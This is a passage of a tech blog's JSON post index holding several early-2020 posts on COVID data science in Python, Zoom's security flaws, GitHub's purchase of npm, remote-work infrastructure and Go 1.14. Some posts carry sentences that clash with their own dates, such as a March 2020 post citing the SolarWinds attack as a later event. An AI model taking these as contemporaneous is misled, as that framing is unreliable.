extract insights using NLP techniques.\nI\u0026rsquo;ve been spending my evenings working through some of these notebooks, and the quality varies enormously. Some are rigorous, well-documented analyses from domain experts who happen to know Python. Others are\u0026hellip; less so. The democratization of data science tools means that anyone with pip install pandas can produce a chart that looks authoritative. Whether the underlying analysis is sound is another matter entirely.\nSIR Models and Their Limitations # The most common analytical framework showing up in Python notebooks right now is the SIR (Susceptible-Infected-Recovered) model and its variants (SEIR, SEIRD). These compartmental models have been used in epidemiology for nearly a century, and they translate naturally into systems of differential equations that SciPy can solve.\nA basic SIR model in Python is maybe 30 lines of code with scipy.integrate.odeint. It\u0026rsquo;s elegant and approachable, which is precisely the problem. I\u0026rsquo;ve seen dozens of blog posts and notebooks where developers with no epidemiological background fit an SIR model to Johns Hopkins data and draw sweeping conclusions about infection trajectories.\nThe models are sensitive to their parameters — particularly the basic reproduction number (R₀) and the recovery rate. Small changes in these values produce dramatically different projections. Professional epidemiologists spend years learning how to estimate these parameters, account for reporting biases, and interpret results within appropriate uncertainty bounds. A three-paragraph Medium post with a matplotlib chart doesn\u0026rsquo;t capture any of that nuance.\nThis isn\u0026rsquo;t Python\u0026rsquo;s fault, of course. It\u0026rsquo;s a communication problem. But it\u0026rsquo;s exacerbated by how easy Python makes it to go from \u0026ldquo;I wonder what this data looks like\u0026rdquo; to \u0026ldquo;here\u0026rsquo;s my published analysis\u0026rdquo; in an afternoon.\nWhere Python Is Genuinely Helping # Setting aside the amateur hour, Python is doing crucial work in several areas:\nHospital resource planning: Teams are using pandas and optimization libraries to model ICU capacity, ventilator allocation, and PPE supply chains. The COVID-19 Hospital Impact Model (CHIME) from Penn Medicine is an excellent example — a Streamlit app that lets hospital administrators project patient loads based on local parameters.\nGenomic analysis: Biopython and related tools are being used to analyze SARS-CoV-2 genome sequences, tracking mutations and understanding viral evolution. The Nextstrain project uses Python extensively in its pipeline for phylogenetic analysis.\nNLP on research literature: With tens of thousands of papers being published, NLP techniques — topic modeling, named entity recognition, summarization — are essential for keeping up. The spaCy and Hugging Face ecosystems are seeing heavy use here.\nDashboard and visualization: Plotly Dash, Streamlit, and Bokeh are powering dozens of public-facing dashboards that health officials and journalists rely on daily.\nThe Reproducibility Challenge # One issue I keep running into is reproducibility. Different Python environments, different package versions, different data snapshots — it\u0026rsquo;s the same problem that\u0026rsquo;s plagued data science for years, but amplified by the urgency of the situation.\nA notebook that worked last week might produce different results today because the underlying dataset was revised (which happens constantly as countries backfill their reporting). Models that were fit to data from two weeks ago may already be obsolete as lockdown measures change the dynamics.\nThe best projects I\u0026rsquo;ve seen address this explicitly: they pin their dependencies, version their data, and document their assumptions clearly. The worst just have a requirements.txt that says pandas without a version number. If the pandemic teaches the data science community one thing, I hope it\u0026rsquo;s that reproducibility isn\u0026rsquo;t optional.\nMy Take # Python\u0026rsquo;s role in the pandemic response is a double-edged sword. On one hand, having a free, accessible, powerful data analysis stack means that more people can contribute to understanding the crisis. On the other hand, the low barrier to entry means that misleading analyses spread almost as fast as the virus itself.\nMy advice to fellow developers who are tempted to do COVID-19 data analysis: do it. It\u0026rsquo;s a great learning exercise. But before you hit publish, ask yourself whether you\u0026rsquo;d trust your analysis if it were about a topic you actually know deeply. If the answer is no, maybe share it with a caveat or collaborate with someone who has domain expertise.\nThe tools have never been better. Python 3.8, pandas 1.0, the maturing Jupyter ecosystem — we\u0026rsquo;re in a golden age of accessible data science. The responsibility now is to use these tools wisely, especially when lives depend on the conclusions people draw from our charts.\nStay home. Write Python. But maybe don\u0026rsquo;t publish that SIR model just yet.\n","date":"2 April 2020","externalUrl":null,"permalink":"/posts/200402-python-covid-data-science/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python and its data science ecosystem are playing a central role in COVID-19 analysis, from epidemiological modeling to resource allocation dashboards.","title":"Python at the Frontlines — How Data Science Is Shaping the Pandemic Response","type":"posts"},{"content":"Two weeks into the great remote work migration, one application has become synonymous with the new normal: Zoom. Daily meeting participants jumped from 10 million in December to reportedly over 200 million this month. Schools, businesses, governments, and families have all converged on this single platform. And the cracks are showing.\nThe term \u0026ldquo;Zoombombing\u0026rdquo; has entered the lexicon almost overnight. Uninvited guests are crashing meetings with offensive content, screen-sharing inappropriate material in classrooms, and generally exploiting the fact that Zoom prioritized ease of use over security for years. But having spent thirty years watching companies navigate the tension between usability and security, I can tell you: Zoombombing is the symptom, not the disease.\nThe Default Settings Problem # The root cause of Zoombombing is embarrassingly simple: Zoom meetings, by default, didn\u0026rsquo;t require passwords, and meeting IDs were short enough to be guessable or sharable. Anyone with a meeting link — or anyone willing to try random meeting IDs — could join.\nZoom has started rolling out fixes. Passwords are being enabled by default, and waiting rooms are being promoted more aggressively. But these are features that existed all along — they just weren\u0026rsquo;t the defaults. This is a classic case of a company optimizing for frictionless onboarding at the expense of security.\nI\u0026rsquo;ve seen this pattern repeatedly in my career. When a product is fighting for market share, every additional click in the setup flow is a potential lost user. Security features get tucked away in settings menus. Sensible defaults get loosened because \u0026ldquo;enterprise customers will configure it properly.\u0026rdquo; Then suddenly you have 200 million users, and the defaults are your security posture. This exactly mirrors what happened as remote work infrastructure was stress-tested during the pandemic shift.\nThe lesson for developers and product managers: your defaults are your security policy for 90% of your users. Most people never change settings. Design accordingly.\nThe Encryption Claims # More concerning than Zoombombing is the scrutiny around Zoom\u0026rsquo;s encryption practices. The Intercept reported that despite Zoom\u0026rsquo;s marketing materials claiming \u0026ldquo;end-to-end encryption,\u0026rdquo; the company actually uses transport encryption (TLS) for most calls. The encryption keys are generated and managed by Zoom\u0026rsquo;s servers, meaning Zoom itself could theoretically access meeting content.\nThere\u0026rsquo;s a meaningful technical distinction here. End-to-end encryption means only the participants can decrypt the communication — not even the service provider has access. Transport encryption means the data is encrypted in transit but the server can decrypt it. For a platform handling sensitive business meetings, medical consultations, and government communications, this distinction matters enormously.\nZoom has acknowledged the discrepancy, essentially admitting they used \u0026ldquo;end-to-end\u0026rdquo; loosely to mean \u0026ldquo;encrypted from endpoint to endpoint\u0026rdquo; rather than in the cryptographic sense. That\u0026rsquo;s\u0026hellip; not how cryptography works. You don\u0026rsquo;t get to redefine established security terminology for marketing convenience.\nTo be fair, implementing true end-to-end encryption for group video calls is genuinely hard. The server typically needs to decode and re-encode video streams to optimize bandwidth for each participant (Selective Forwarding Units vs. Multipoint Control Units). But the right response is to be transparent about your architecture, not to misrepresent it.\nThe Broader Privacy Picture # The security issues go beyond encryption. Researchers have uncovered several concerning behaviors:\nData sharing with Facebook: Zoom\u0026rsquo;s iOS app was sending analytics data to Facebook even for users who didn\u0026rsquo;t have Facebook accounts, via the Facebook SDK. Zoom removed this after it was reported, calling it an oversight. Attention tracking: Zoom had a feature that told meeting hosts if a participant\u0026rsquo;s Zoom window wasn\u0026rsquo;t in focus for more than 30 seconds. Think about what that means for employee surveillance. LinkedIn integration: Zoom\u0026rsquo;s LinkedIn Sales Navigator integration allowed meeting participants to access LinkedIn profiles of other attendees without their knowledge. Local web server on Mac: Zoom previously installed a hidden web server on Macs that persisted even after uninstalling the app, ostensibly to bypass Safari click-to-open prompts. Each of these individually might be explainable as a product decision made in isolation. Taken together, they paint a picture of a company that consistently prioritized growth metrics over user privacy.\nWhat This Means for Enterprise Software # The Zoom situation is a case study in what happens when consumer-grade software gets deployed at enterprise scale without proper vetting. Many organizations adopted Zoom not through a formal procurement process but through bottom-up usage — employees downloading it because it \u0026ldquo;just worked\u0026rdquo; better than the official corporate tools.\nShadow IT has always been a challenge, but the sudden shift to remote work compressed what would normally be months of evaluation into days of desperation. IT departments that might have flagged Zoom\u0026rsquo;s security posture during a normal review cycle simply didn\u0026rsquo;t have time.\nThis should prompt every organization to ask: what other tools did we adopt in the rush to go remote? What are their security characteristics? Do we even know what our employees are using?\nMy Take # I don\u0026rsquo;t think Zoom is malicious. I think they\u0026rsquo;re a company that built a product optimized for ease of use in a competitive market, accumulated technical and security debt along the way, and suddenly found themselves operating at a scale that made that debt visible to everyone.\nThe real question is how they respond. So far, the signs are mixed. They\u0026rsquo;ve been quick to patch the most egregious issues, but the encryption misrepresentation suggests a cultural problem that patches alone won\u0026rsquo;t fix. Security and privacy need to be architectural decisions, not afterthoughts bolted on when the press starts asking questions.\nFor developers, the takeaway is straightforward: security defaults matter more than security options. Encryption claims need to be precise and auditable. And if your product suddenly scales by 20x, every shortcut you ever took will be found.\nI\u0026rsquo;m cautiously watching to see if Zoom treats this as a genuine inflection point or just a PR problem to manage. The next few weeks will tell us a lot.\n","date":"26 March 2020","externalUrl":null,"permalink":"/posts/200326-zoom-security-crisis/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Zoom’s explosive pandemic-driven growth is exposing serious security and privacy issues. The ‘Zoombombing’ phenomenon is just the tip of the iceberg.","title":"Zoom's Security Reckoning — When Rapid Growth Exposes Technical Debt","type":"posts"},{"content":"In the middle of a global pandemic, with most of us adjusting to working from home, GitHub quietly dropped one of the most significant announcements in JavaScript\u0026rsquo;s history: they\u0026rsquo;re acquiring npm. The news landed on Monday, and after a few days to digest it, I have thoughts. GitHub had just recently launched Actions as a CI/CD platform, setting the stage for this consolidation.\nFor the uninitiated, npm is the default package manager for Node.js and the world\u0026rsquo;s largest software registry, hosting over 1.3 million packages. If you\u0026rsquo;ve written JavaScript in the past decade, npm has been as fundamental to your workflow as your text editor. GitHub, of course, is where most of those packages\u0026rsquo; source code lives. The two have been inextricably linked for years — this acquisition just makes it official.\nThe Consolidation Play # Let\u0026rsquo;s be direct about what\u0026rsquo;s happening here: Microsoft (via GitHub) now controls both the place where JavaScript code is stored and the place where JavaScript packages are distributed. That\u0026rsquo;s an enormous amount of influence over the most widely used programming language in the world.\nGitHub already launched GitHub Packages last year, their own package registry that supports npm, Docker, Maven, and others. The npm acquisition accelerates that strategy significantly. Instead of competing with npm, they\u0026rsquo;re absorbing it.\nFrom a business perspective, it makes perfect sense. npm Inc. has struggled financially for years despite managing critical infrastructure. There were reports of layoffs and internal turmoil. The registry itself has had reliability issues. GitHub, backed by Microsoft\u0026rsquo;s resources, can invest in the infrastructure that npm desperately needs.\nWhat Developers Should Expect # Nat Friedman, GitHub\u0026rsquo;s CEO, has been clear that the npm registry will remain free and open. The public registry isn\u0026rsquo;t going anywhere. That\u0026rsquo;s the right call — any attempt to monetize it directly would trigger a mass exodus to alternatives like Yarn\u0026rsquo;s registry or a community fork.\nWhat I expect we\u0026rsquo;ll see is tighter integration between GitHub and npm:\nIdentity consolidation: Log into npm with your GitHub account. This simplifies things but also centralizes identity. Security improvements: GitHub has invested heavily in security tooling (Dependabot, security advisories). Bringing npm under that umbrella should mean better vulnerability scanning and automated patching. GitHub Actions integration: Publishing packages as part of CI/CD workflows will likely become seamless, especially as GitHub Actions matures as a platform. Improved infrastructure: The npm registry has had downtime issues. Microsoft\u0026rsquo;s cloud infrastructure should help. These are all genuinely good outcomes for the average developer. The npm experience has had rough edges for years, and GitHub has the engineering resources to smooth them out.\nThe Centralization Concern # Here\u0026rsquo;s where I put on my grumpy veteran hat. I\u0026rsquo;ve been building software since before the web existed, and I\u0026rsquo;ve watched the industry cycle between centralization and decentralization multiple times. We\u0026rsquo;re deep in a centralization phase right now, and this acquisition is a perfect example.\nConsider what Microsoft now controls in the JavaScript ecosystem:\nGitHub: Where the code lives npm: Where the packages are distributed VS Code: The most popular editor for JavaScript development TypeScript: The language that\u0026rsquo;s rapidly becoming the default for new JavaScript projects Azure: A major deployment target That\u0026rsquo;s not inherently evil — Microsoft under Satya Nadella has been a genuinely good steward of developer tools. But it\u0026rsquo;s a lot of eggs in one basket. The entire JavaScript supply chain, from writing code to publishing packages, can now flow entirely through Microsoft-owned infrastructure.\nThe open source community should be having a serious conversation about this. Not because Microsoft is likely to do something nefarious tomorrow, but because concentration of control over critical infrastructure is a structural risk regardless of who holds the keys.\nSupply Chain Security Implications # One area where this acquisition could have an immediate positive impact is supply chain security. The npm ecosystem has been plagued by security incidents — malicious packages, typosquatting attacks, and compromised maintainer accounts. The event-stream incident in 2018 demonstrated how a single compromised package deep in the dependency tree could affect millions of projects. Later incidents like the SolarWinds attack would underscore how critical supply chain security has become.\nGitHub\u0026rsquo;s security team has been doing solid work with automated vulnerability detection. If they can bring that expertise to npm — verifying package provenance, detecting suspicious publishes, flagging unusual dependency patterns — that would be a meaningful improvement for everyone.\nThe challenge is doing this without creating friction for legitimate package maintainers. The npm ecosystem\u0026rsquo;s strength has always been its low barrier to entry. Anyone can publish a package in minutes. Adding security gates that slow down that process would undermine what makes npm npm.\nMy Take # I think this acquisition is net positive in the short term and uncertain in the long term. npm needed investment it wasn\u0026rsquo;t getting as an independent company. The registry is too important to fail, and it was showing signs of strain. GitHub (and Microsoft) have the resources and the engineering talent to stabilize and improve it.\nBut I\u0026rsquo;d like to see the community invest more in alternatives and decentralization. Entropic, the federated package manager that some former npm employees started, represents the kind of thinking we need more of. Even if it never becomes the default, having viable alternatives keeps the ecosystem healthy.\nFor now, my advice to JavaScript developers is pragmatic: keep using npm, take advantage of the improved security tooling as it arrives, but don\u0026rsquo;t delete your Yarn lockfiles just yet. And if you\u0026rsquo;re a package maintainer, pay attention to the terms of service changes that will inevitably come. The details matter.\nThe JavaScript ecosystem has survived bigger upheavals than this. It\u0026rsquo;ll adapt. It always does.\n","date":"19 March 2020","externalUrl":null,"permalink":"/posts/200319-github-acquires-npm/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub’s acquisition of npm consolidates the JavaScript ecosystem’s most critical infrastructure under one roof. Here’s why that matters — and what could go wrong.","title":"GitHub Acquires npm — What This Means for the JavaScript Ecosystem","type":"posts"},{"content":"Yesterday, the World Health Organization officially declared COVID-19 a global pandemic. As someone who\u0026rsquo;s been building software for three decades, I\u0026rsquo;ve seen the tech community respond to crises before — but nothing quite like what\u0026rsquo;s unfolding right now. Within days of the virus spreading beyond China\u0026rsquo;s borders, open source developers around the world started spinning up projects that are genuinely making a difference. The critical infrastructure challenges this exposed forced the entire industry to rethink operational practices.\nThe Johns Hopkins Dashboard # If you haven\u0026rsquo;t seen it yet, researchers at Johns Hopkins University built an interactive dashboard that tracks confirmed cases, deaths, and recoveries in real time. What makes this remarkable from a technical standpoint is that it\u0026rsquo;s powered by a publicly accessible GitHub repository that aggregates data from WHO, CDC, and dozens of regional health authorities.\nThe repository has exploded in activity. As of this week, it has thousands of stars and hundreds of forks, with contributors submitting pull requests to correct data, add new sources, and improve the ingestion pipeline. The data is published as CSV files — simple, portable, and easily consumed by any tool or language. It\u0026rsquo;s a masterclass in making critical data accessible.\nI\u0026rsquo;ve been pulling the data into a Jupyter notebook myself, partly out of professional curiosity and partly because the situation demands that we all pay attention. The fact that this resource exists because a handful of researchers decided to open-source their work is exactly why I\u0026rsquo;ve been an advocate for open source for decades.\nFolding@home Breaks Records # The distributed computing project Folding@home has seen an extraordinary surge in volunteers. The project, which uses idle computing power from volunteers\u0026rsquo; machines to simulate protein folding, launched specific COVID-19 work units this week. The response has been staggering — the project\u0026rsquo;s aggregate computing power has reportedly surpassed some of the world\u0026rsquo;s top supercomputers.\nFor those unfamiliar, Folding@home has been around since 2000, running on a simple but elegant model: download a client, donate your spare CPU/GPU cycles, and contribute to scientific research. The COVID-19 proteins they\u0026rsquo;re simulating could help identify potential drug targets. It\u0026rsquo;s one of those projects that reminds you what distributed systems are really about — not just microservices and Kubernetes clusters, but actual distributed computing in the original sense of the term.\nI installed the client on three machines in my home office this morning. If you have cycles to spare, I\u0026rsquo;d encourage you to do the same.\nRapid Collaboration on GitHub # Beyond these headline projects, GitHub is seeing a wave of COVID-related repositories. Developers are building everything from symptom checkers to supply chain coordination tools. Several governments are working on open source contact tracing solutions. The speed at which these projects are materializing is a testament to how much the developer ecosystem has matured.\nWhat strikes me is the tooling. Twenty years ago, coordinating a global open source response to a crisis would have taken weeks just to set up the infrastructure — mailing lists, version control, build systems. Today, a developer can create a GitHub repo, set up CI/CD with GitHub Actions, deploy to a cloud provider, and have contributors from six continents submitting PRs within hours.\nThe pandemic is also forcing interesting conversations about data standards. How do you normalize case counts across countries that report differently? How do you handle time zones in a global dataset? These are the kinds of mundane but critical engineering problems that open source communities are uniquely positioned to solve through collective expertise.\nThe Remote Work Experiment # I should note that this pandemic response is happening while the tech industry itself is undergoing a massive, unplanned experiment. Most major tech companies — Google, Microsoft, Amazon, Twitter — have told employees to work from home. Open source contribution, which has always been inherently remote-first, is suddenly the default mode for all software development.\nThere\u0026rsquo;s a certain irony here. The tools we built for distributed collaboration — Git, Slack, Zoom, CI/CD pipelines — are now the critical infrastructure keeping the entire industry running. Every standup is a video call. Every code review is asynchronous. The open source workflow that some managers once viewed skeptically is now the only workflow. GitHub Actions would emerge as the dominant CI/CD solution just months after, showing how pandemic-driven remote work accelerated tooling consolidation.\nMy Take # I\u0026rsquo;ve been through the dot-com crash, the 2008 financial crisis, and several \u0026ldquo;this changes everything\u0026rdquo; moments in tech. This feels different. The speed and scale of the open source community\u0026rsquo;s response to COVID-19 is unlike anything I\u0026rsquo;ve witnessed. It\u0026rsquo;s not just developers scratching their own itch — it\u0026rsquo;s developers applying their skills to a genuine humanitarian crisis.\nThe projects I\u0026rsquo;m most impressed by aren\u0026rsquo;t the flashiest. They\u0026rsquo;re the ones maintaining clean datasets, building accessible APIs, and writing documentation that non-technical researchers can follow. That\u0026rsquo;s the unglamorous work that actually moves the needle.\nIf you\u0026rsquo;re a developer looking to contribute, start with the COVID-19 Open Research Dataset (CORD-19), which contains over 29,000 scholarly articles. There\u0026rsquo;s meaningful NLP and data engineering work to be done making that corpus searchable and useful. Or contribute cycles to Folding@home. Or help maintain one of the dozens of tracking dashboards that public health officials are relying on. The sustainability questions facing open source maintainers would only become more acute as the pandemic stressed both individuals and communities.\nWe\u0026rsquo;re in for a rough few months. But seeing the open source community mobilize this quickly gives me real confidence that the tech industry\u0026rsquo;s response will be substantive, not just performative.\n","date":"12 March 2020","externalUrl":null,"permalink":"/posts/200312-open-source-pandemic-response/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As the WHO declares a pandemic, open source developers worldwide are mobilizing with tracking dashboards, distributed computing, and collaborative tools at unprecedented speed.","title":"Open Source Rallies — The Tech Community's Response to a Global Pandemic","type":"posts"},{"content":"This week, the conversation in tech shifted rapidly from \u0026ldquo;should we cancel the conference?\u0026rdquo; to \u0026ldquo;can our entire company work from home?\u0026rdquo; Twitter announced an optional work-from-home policy. Amazon told Seattle employees to work remotely if possible. Google is doing the same in Dublin. Microsoft, Square, and others are following suit. Mobile World Congress was cancelled weeks ago. Google I/O and Facebook F8 are looking increasingly uncertain. The tech community would soon mobilize comprehensive responses to the broader crisis.\nWhat interests me as an engineer isn\u0026rsquo;t the virus itself — I\u0026rsquo;ll leave that to the epidemiologists — but the sudden, large-scale stress test being applied to remote work infrastructure. We\u0026rsquo;re about to find out which companies actually invested in distributed-work capabilities and which ones just talked about it.\nThe VPN Bottleneck # Here\u0026rsquo;s a dirty secret about enterprise remote work: most companies\u0026rsquo; VPN infrastructure was never designed for 100% of employees connecting simultaneously. VPN concentrators are typically sized for 10-30% concurrent usage, because historically, remote work was the exception. If a company with 10,000 employees suddenly needs all of them on VPN, the existing hardware simply won\u0026rsquo;t handle it.\nI\u0026rsquo;ve been talking to infrastructure leads at several companies this week, and the scramble is real. VPN licenses are being purchased urgently. Split-tunnel configurations are being rolled out to reduce load — routing only corporate traffic through the VPN while letting YouTube and Spotify go direct. Some companies are discovering that their VPN infrastructure hasn\u0026rsquo;t been load-tested at these levels\u0026hellip; ever.\nThe smarter organizations moved to a zero-trust networking model over the past few years. Tools like Google\u0026rsquo;s BeyondCorp approach, or products like Cloudflare Access and Zscaler Private Access, authenticate users and devices without requiring a traditional VPN tunnel. If your applications are already accessible through an identity-aware proxy, scaling to 100% remote is primarily about bandwidth, not VPN capacity.\nCollaboration Tools Under Pressure # Slack, Microsoft Teams, Zoom, and Google Meet are about to experience usage spikes they\u0026rsquo;ve never seen. Zoom in particular has been riding a wave of adoption, and their infrastructure will be tested at scale. Video conferencing is bandwidth-intensive and latency-sensitive — the kind of workload that\u0026rsquo;s hard to scale gracefully.\nFor engineering teams specifically, the collaboration challenge goes beyond video calls. Code review, pair programming, incident response, and design discussions all have established in-office patterns that need remote equivalents:\nCode review translates well — GitHub and GitLab pull requests work the same regardless of where you sit Pair programming is harder — tools like VS Code Live Share and Tuple help, but they\u0026rsquo;re not yet standard Incident response needs a virtual war room — Slack channels plus a persistent video call, with clear communication protocols Whiteboarding is the biggest gap — Miro and Figma help, but the spontaneity of walking up to a whiteboard is hard to replicate Companies that already have distributed teams have solved most of these problems. GitLab, with its all-remote model and public handbook, is often cited as the gold standard. Basecamp and Automattic (the WordPress company) have been remote-first for years. The rest of the industry is about to get a crash course in what these companies learned the hard way.\nThe Development Environment Question # Here\u0026rsquo;s one that catches companies off guard: can your developers actually build and test the product from home? This sounds obvious, but many organizations have development dependencies that only work on the corporate network:\nInternal package registries and artifact repositories Shared development databases and staging environments License servers for commercial tools CI/CD pipelines that run on-premises Hardware test labs and device farms If your development workflow requires access to resources that are only reachable from the office network, you need a plan. The VPN approach works but adds latency and bandwidth constraints. A better long-term solution is making development infrastructure accessible securely from anywhere — containerized development environments, cloud-hosted CI/CD, and remote development servers.\nI\u0026rsquo;ve been running my development environment in Docker containers for the past year, with all dependencies defined in docker-compose.yml. When I work from home, my setup is identical to the office — same container images, same configurations, same behavior. Docker Desktop has matured significantly to support exactly this kind of portable development workflow. The initial investment in containerizing the dev environment pays dividends in exactly this scenario:\n# docker-compose.yml — portable dev environment version: \u0026#39;3.8\u0026#39; services: app: build: . volumes: - .:/workspace ports: - \u0026#34;3000:3000\u0026#34; postgres: image: postgres:12 environment: POSTGRES_DB: myapp_dev redis: image: redis:6-alpine What Companies Should Be Doing Right Now # If you\u0026rsquo;re in a position to influence your company\u0026rsquo;s technical infrastructure, here\u0026rsquo;s what I\u0026rsquo;d prioritize this week:\nLoad-test your VPN at 3x current peak usage. If it breaks, you need split-tunneling at minimum, and zero-trust networking as a strategic investment. Document everything that requires on-premises access. Create a spreadsheet of every service, tool, and resource that only works from the office. Each one is a single point of failure for remote work. Test your video conferencing at scale. Have a large all-hands meeting over video and see what breaks. Bandwidth, audio quality, screen sharing — find the problems before they\u0026rsquo;re critical. Ensure your CI/CD pipeline works for remote developers. If builds are triggered by pushing to a repository (as they should be), this is probably fine. If there are manual steps that require office access, fix them now. Write down your incident response process for a fully remote team. Who gets paged? What\u0026rsquo;s the communication channel? How do you coordinate when you can\u0026rsquo;t walk over to someone\u0026rsquo;s desk? My Take # I\u0026rsquo;ve worked remotely on and off for years, and I\u0026rsquo;ve long believed that most knowledge work can be done effectively from anywhere with a decent internet connection. What\u0026rsquo;s different about this moment is the speed and scale of the transition. Companies that planned for gradual adoption of remote work are being forced into it over the course of days.\nThe good news is that the tooling has never been better. Cloud infrastructure, container orchestration, modern collaboration tools, and fast home internet connections make remote work technically feasible for most software teams. The challenge is organizational, not technical — communication patterns, meeting culture, trust, and management practices all need to adapt.\nI suspect — and hope — that this forced experiment will permanently shift how the tech industry thinks about remote work. Even after the immediate health concerns pass, companies that discover their teams can be productive from home may not go back to mandatory office attendance. That would be a genuine silver lining.\nBut right now, the priority is making sure the infrastructure holds. Check your VPN. Test your tools. Document your dependencies. The stress test is coming.\nThis post is part of my Infrastructure Notes series. I have a feeling this topic is going to be a recurring one in the weeks ahead.\n","date":"5 March 2020","externalUrl":null,"permalink":"/posts/200305-tech-remote-work-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As tech companies start mandating work-from-home policies amid growing COVID-19 concerns, the infrastructure supporting remote work faces its biggest test yet.","title":"The Remote Work Stress Test — Is Our Infrastructure Ready?","type":"posts"},{"content":"Go 1.14 was released two days ago, and while it doesn\u0026rsquo;t grab headlines like a major version bump might, it\u0026rsquo;s one of those releases that makes the language meaningfully better to work with day-to-day. The headline features are the module system being declared \u0026ldquo;ready for production,\u0026rdquo; significant performance improvements in the runtime, and asynchronous goroutine preemption. Each of these addresses real friction points that Go developers have been dealing with. This parallels the pattern we\u0026rsquo;re seeing across the language ecosystem, where Python is making performance a priority and other languages are maturing their ecosystems.\nModules Are Finally Production-Ready # Go modules were introduced experimentally in Go 1.11 and have been gradually maturing since. With Go 1.14, the module system is officially recommended for all development, and GOPATH mode is on its way out. The go command now handles module-aware mode by default even outside of GOPATH, and the -mod=vendor flag is automatically applied when a vendor directory exists.\nFor those of us who\u0026rsquo;ve been using modules since Go 1.12, this isn\u0026rsquo;t a dramatic change. But there are meaningful improvements in how modules handle edge cases:\n# Module graph pruning is smarter go mod tidy # Now removes more unnecessary dependencies # The go.sum file is more accurate go mod verify # Better checksum verification The GOINSECURE environment variable is new and lets you specify modules that can be fetched without TLS — useful for internal corporate registries that haven\u0026rsquo;t gotten around to setting up proper certificates. It\u0026rsquo;s a pragmatic addition that acknowledges how Go is used in enterprise environments.\nWhat I appreciate most is the improved error messages when module resolution fails. Previously, you\u0026rsquo;d sometimes get cryptic errors about version constraints that required detective work to untangle. Go 1.14 does a better job of explaining why a particular version was selected or why a dependency can\u0026rsquo;t be resolved. Small quality-of-life improvements like this compound over time. This focus on developer experience mirrors what TypeScript has done with incremental improvements to make the language more usable.\nGoroutine Preemption — The Big Runtime Change # The most technically significant change in Go 1.14 is the move to asynchronous goroutine preemption. Previously, goroutines could only be preempted at function call boundaries — meaning a tight loop without function calls could monopolize an OS thread indefinitely. This was a real problem in production systems:\n// This goroutine could previously block the entire OS thread go func() { for { // Tight computational loop with no function calls // Other goroutines on this thread would starve } }() With Go 1.14, the runtime uses OS signals (specifically SIGURG on Unix systems) to preempt goroutines at almost any point. This means the scheduler can interrupt long-running computations to give other goroutines a chance to run.\nThe practical impact is significant for certain workloads. If you\u0026rsquo;re doing CPU-intensive computation — data processing, cryptographic operations, numerical work — your goroutines will now share CPU time more fairly. I\u0026rsquo;ve seen reports of improved tail latency in services that mix compute-heavy and I/O-bound goroutines on the same set of threads.\nThere\u0026rsquo;s a subtle implication for unsafe code, though. Because preemption can now happen at almost any instruction, code that uses unsafe.Pointer in ways that violate the rules (holding derived pointers across potential preemption points) might break. The Go documentation on unsafe.Pointer rules has always been clear about this, but previously you could get away with violations because preemption only happened at predictable points. If you\u0026rsquo;re using unsafe, now is a good time to audit your code.\nPerformance Improvements Across the Board # Go 1.14 includes a grab bag of performance improvements that together make a noticeable difference:\nDeferred function calls are nearly zero-overhead in most cases. The compiler now inlines deferred calls when it can prove they\u0026rsquo;re straightforward, eliminating the previous ~35ns overhead per defer statement. This means you can use defer for cleanup without worrying about performance in hot paths.\nTimer precision is improved, which matters for network services that set timeouts and deadlines. The runtime now uses a more efficient timer heap.\nPage allocator improvements reduce memory allocation latency, particularly for programs that allocate and free large amounts of memory.\nThe defer improvement is the one I\u0026rsquo;m most excited about. Go has always encouraged using defer for resource cleanup — closing files, releasing locks, finishing spans — but the performance overhead meant that performance-sensitive code sometimes avoided it. With zero-overhead defer, there\u0026rsquo;s much less reason to write error-prone manual cleanup code:\nfunc processFile(path string) error { f, err := os.Open(path) if err != nil { return err } defer f.Close() // Now nearly free in most cases // ... process file return nil } The Testing Improvements # A smaller but welcome change: go test now reports a cleaner output format, and the -v flag produces streaming output instead of buffering it. This means you see test results as they happen, which is valuable for slow integration tests where you want to know progress without waiting for the entire suite to complete.\nThere\u0026rsquo;s also a new testing.TB.Cleanup method that registers cleanup functions for tests and benchmarks. It\u0026rsquo;s similar to defer but scoped to the test lifetime:\nfunc TestDatabase(t *testing.T) { db := setupTestDB(t) t.Cleanup(func() { db.Close() os.Remove(db.Path()) }) // ... test code } This is particularly useful in table-driven tests and sub-tests where defer doesn\u0026rsquo;t have the right scoping behavior.\nMy Take # Go 1.14 is exactly the kind of release I want to see from a mature language: focused on making existing patterns faster and more reliable, without adding complexity. There\u0026rsquo;s no new syntax to learn, no paradigm shifts to adjust to — just a better version of the tool you were already using.\nThe Go team\u0026rsquo;s discipline in resisting feature creep continues to impress me. Every release cycle, there are proposals for generics, sum types, enums, and other features that would make Go more expressive but also more complex. The team evaluates these carefully and says \u0026ldquo;not yet\u0026rdquo; more often than \u0026ldquo;yes.\u0026rdquo; As someone who works across multiple languages, I appreciate that Go remains a language I can put down for three months and pick up again without having missed a major new feature.\nThat said, the generics question looms large. The current draft design using contracts is being actively discussed, and I suspect we\u0026rsquo;ll see something concrete in the next year or two. For now, Go 1.14 makes the language we have today better, and that\u0026rsquo;s enough.\nIf you\u0026rsquo;re on Go 1.13, upgrade. The module improvements alone are worth it, and the defer performance gains are a free lunch. Just audit any unsafe code first.\nPart of my Developer Landscape series — tracking programming languages and tools as they evolve.\n","date":"27 February 2020","externalUrl":null,"permalink":"/posts/200227-go-1-14-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Go 1.14 ships with production-ready modules, major runtime improvements, and goroutine preemption. A solid release that addresses real developer pain points.","title":"Go 1.14 Arrives — Faster, Leaner, and More Module-Ready","type":"posts"},{"content":"It\u0026rsquo;s been about three months since Docker Inc. sold its Enterprise business to Mirantis, and the dust is starting to settle. The company that kicked off the container revolution is now a much smaller operation, focused squarely on Docker Desktop and Docker Hub — the developer-facing tools rather than the orchestration platform. Having watched Docker\u0026rsquo;s rollercoaster journey from the beginning, I think this pivot, while painful, might be exactly what the company needed. Kubernetes would continue its dominance in the orchestration space, establishing itself as the de facto standard for container management.\nHow We Got Here # The Docker story is a cautionary tale about the gap between technology adoption and business viability. Docker made containers accessible to millions of developers. Before Docker, containers existed (LXC, Solaris Zones, FreeBSD Jails), but they were the domain of systems administrators with deep Linux kernel knowledge. Docker wrapped the complexity in 